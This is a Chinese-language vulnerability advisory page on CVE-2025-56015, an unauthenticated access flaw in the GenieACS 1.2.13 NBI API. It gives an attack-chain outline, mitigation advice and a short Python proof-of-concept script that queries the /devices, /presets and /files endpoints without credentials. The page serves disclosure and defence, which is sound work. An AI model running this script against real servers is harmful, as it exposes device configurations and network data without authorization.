IPBUF安全漏洞报告
English
CVE-2025-56015 CVSS 7.5 高危

CVE-2025-56015 GenieACS NBI API未授权访问漏洞

披露日期: 2026-04-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-56015
漏洞类型
未授权访问
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
GenieACS

相关标签

未授权访问GenieACSAPI安全CVE-2025-56015信息泄露

漏洞概述

GenieACS 1.2.13版本中的NBI(北向接口)API端点存在严重的未授权访问漏洞。该漏洞源于系统缺乏有效的身份验证机制,允许远程攻击者在无需任何凭证的情况下访问敏感接口。由于攻击无需用户交互且利用难度低,攻击者可直接通过网络利用此漏洞获取系统高敏感信息,对机密性造成严重影响。

技术细节

该漏洞的核心在于GenieACS的NBI API组件未对传入的请求进行严格的身份校验。NBI API通常用于与上层OSS/BSS系统交互,包含大量设备配置、状态信息及敏感参数。在受影响版本中,攻击者只需向特定的API路径(如/devices、/presets等)发送HTTP GET或POST请求,即可绕过认证环节。由于CVSS向量显示为AV:N/AC:L/PR:N/UI:N,表明这是一个低权限、无交互的网络攻击。攻击者成功利用后,可读取CPE设备的详细配置、修改设备参数(视API权限而定)或获取网络拓扑信息,导致核心数据泄露。

攻击链分析

STEP 1
侦察
攻击者扫描网络,寻找开放了7557端口(GenieACS NBI默认端口)或特定HTTP路径的目标。
STEP 2
武器化
攻击者构造针对NBI API端点的HTTP请求,无需携带Cookie或Authorization头。
STEP 3
投递与利用
将构造好的恶意请求发送至目标服务器,请求敏感资源如设备列表或配置预设。
STEP 4
数据泄露
服务器返回详细的JSON格式数据,攻击者解析并获取敏感信息,完成攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit Title: GenieACS 1.2.13 NBI API Unauthenticated Access # Description: Checks if the NBI API is accessible without authentication. target_url = "http://target-ip:7557" # Default NBI port check_paths = ["/devices", "/presets", "/files"] def check_vulnerability(): print(f"[*] Checking target: {target_url}") for path in check_paths: url = f"{target_url}{path}" try: response = requests.get(url, timeout=5) if response.status_code == 200: print(f"[+] Potential Vulnerability found at: {url}") print(f"[+] Response snippet: {response.text[:100]}") else: print(f"[-] Status {response.status_code} for {url}") except requests.ConnectionError: print(f"[!] Could not connect to {target_url}") break except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": check_vulnerability()

影响范围

GenieACS 1.2.13

防御指南

临时缓解措施
如果无法立即升级软件,建议暂时关闭对外暴露的NBI API服务,或者通过网络隔离手段,仅允许内网受信任的管理服务器访问该接口,确保公网不可达。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表